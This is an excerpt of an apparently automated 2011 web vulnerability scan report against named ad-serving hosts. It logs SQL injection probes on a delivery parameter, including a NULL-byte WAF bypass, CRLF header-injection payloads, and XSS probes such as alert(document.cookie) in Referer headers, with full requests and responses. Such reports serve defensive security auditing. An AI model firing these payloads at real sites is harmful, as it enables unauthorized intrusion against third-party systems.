Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:46:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:46:15 GMT; path=/
Set-Cookie: OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22726%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3778

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
our system with the leading and award-winning Registry Booster 2011 from Uniblue. Registry Booster 2011 is the safest and most trusted solution to clean and optimize your system, free it from registry errors and fragmented entries.
Through Advanced Error Detection Technology, Registry Booster 2011 automatically identifies missing, corrupt, or invalid items in your Windows registry and dramatically enhances performance and general stability
</p>
...[SNIP]...

Request 2

GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:46:16 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:46:16 GMT; path=/
Set-Cookie: OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3965

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

1.24. http://www8.tucows.com/delivery/afr.php [n parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The n parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the n parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /delivery/afr.php?n=aed03704'&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:48 GMT; path=/
Set-Cookie: OAVARS[aed03704\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%221445%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3808

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.

<p>
...[SNIP]...

Request 2

GET /delivery/afr.php?n=aed03704''&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:49 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:49 GMT; path=/
Set-Cookie: OAVARS[aed03704\'\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3965

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

1.25. http://www8.tucows.com/delivery/afr.php [n parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The n parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the n parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /delivery/afr.php?n=aed03704%00'&zoneid=124&cb=d302be2a HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:38 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:38 GMT; path=/
Set-Cookie: OAVARS[aed03704\0\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%221445%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3794

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.

<p>
...[SNIP]...

Request 2

GET /delivery/afr.php?n=aed03704%00''&zoneid=124&cb=d302be2a HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:39 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:39 GMT; path=/
Set-Cookie: OAVARS[aed03704\0\'\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3951

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

2. HTTP header injection  previous  next
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 939d6%0d%0ad29cc9616d1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22&939d6%0d%0ad29cc9616d1=1 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=7f1e123c-7cbf-4f88-c29c-00007fc2381d; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22&939d6
d29cc9616d1
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.2. http://102.xg4ken.com/media/redir.php [url[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload 15d1e%0d%0ad4b2f64cb5a was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x2215d1e%0d%0ad4b2f64cb5a HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=5768e8a0-3fce-aa69-4351-00001bc16518; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x2215d1e
d4b2f64cb5a

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.3. http://2e76.v.fwmrm.net/ad/l/1 [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The value of the cr request parameter is copied into the Location response header. The payload ae913%0d%0a56b335fe342 was submitted in the cr parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/l/1?last=0&ct=0&metr=127&s=c110&t=129676725240202813&adid=249349&reid=123864&arid=0&auid=&cn=defaultImpression&et=i&_cc=249349,123864,10361.,10361.10364.,1296767252,1&tpos=0&iw=&uxnw=11894&uxss=sg11948&uxct=1&init=1&cr=ae913%0d%0a56b335fe342 HTTP/1.1
Host: 2e76.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _auv="g11951~5.1296076541.0,12670.1296075237.880,12671.1296076541.0,^"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209; _sid="c110_5569572937864193463"; _uid="a104_5562153497824379009"; _vr="1296767252.0+7564699552021921.248599~249349~331220~,"; _sc="sg12288.1296767252.1296767253.28800.0.0,"; _wr="g12288"

Response

HTTP/1.1 302 Found
Set-Cookie: _auv="g12288~1.1296769260.0,12720.1296769260.0,^";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cvr="1296769250^11894^sg12288~sg11948^0~0^0.000000~55.000000,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1296769245.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg12288.1296767252.1296769260.28800.0.0,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g12288";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Location: ae913
56b335fe342

Content-Length: 0
Date: Thu, 03 Feb 2011 21:40:59 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f0b45525d5f4f58455e445a4a423208;path=/;httponly


2.4. http://ad.br.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 24537%0d%0a2e8dc5adfe9 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleusipad%2F1%2FH.22.1%2Fs9681528011336%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D3%252F1%252F2011%252011%253A50%253A27%25204%2520360%26pageName%3Dipad%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26r%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.ipad%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26c5%3Dwin32%26c6%3D%253A%2520ipad%2520-%2520index%2520%28us%29%26c9%3Dwindows%26c14%3Ditunes%2520-%2520index%2520%28us%29%26c15%3Dno%2520zip%26c17%3Dundefined%253Aundefined%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleusipad%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dipad%253D1%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1037%26bh%3D1012%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26u%3Dappleglobal%2Cappleitunes%2Cappleusitunesipod%26pid%3Ditunes%2520-%2520index%2520%28us%29%26pidt%3D1%26oid%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26ot%3DA%26u%3D0%26AQE%3D124537%0d%0a2e8dc5adfe9&A2S=1;ord=2015452841 HTTP/1.1
Host: ad.br.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/ipad/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.0 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleusipad/1/H.22.1/s9681528011336?AQB=1&vvpr=true&&ndh=1&t=3%2F1%2F2011%2011%3A50%3A27%204%20360&pageName=ipad%20-%20index%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fipad%2F&r=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.ipad&c4=http%3A%2F%2Fwww.apple.com%2Fipad%2F&c5=win32&c6=%3A%20ipad%20-%20index%20(us)&c9=windows&c14=itunes%20-%20index%20(us)&c15=no%20zip&c17=undefined%3Aundefined&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleusipad&c48=1&c49=D%3Ds_vi&c50=ipad%3D1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1037&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&u=appleglobal,appleitunes,appleusitunesipod&pid=itunes%20-%20index%20(us)&pidt=1&oid=http%3A%2F%2Fwww.apple.com%2Fipad%2F&ot=A&u=0&AQE=124537
2e8dc5adfe9
&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1296755474


2.5. http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.scanscout.com/B4852812.30

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62530%0d%0a230925b8b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62530%0d%0a230925b8b8/N3340.scanscout.com/B4852812.30 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62530
230925b8b8
/N3340.scanscout.com/B4852812.30:
Date: Thu, 03 Feb 2011 22:03:15 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.23

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 333cd%0d%0a3e381d53e01 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /333cd%0d%0a3e381d53e01/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443;ord=5929963708858950656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
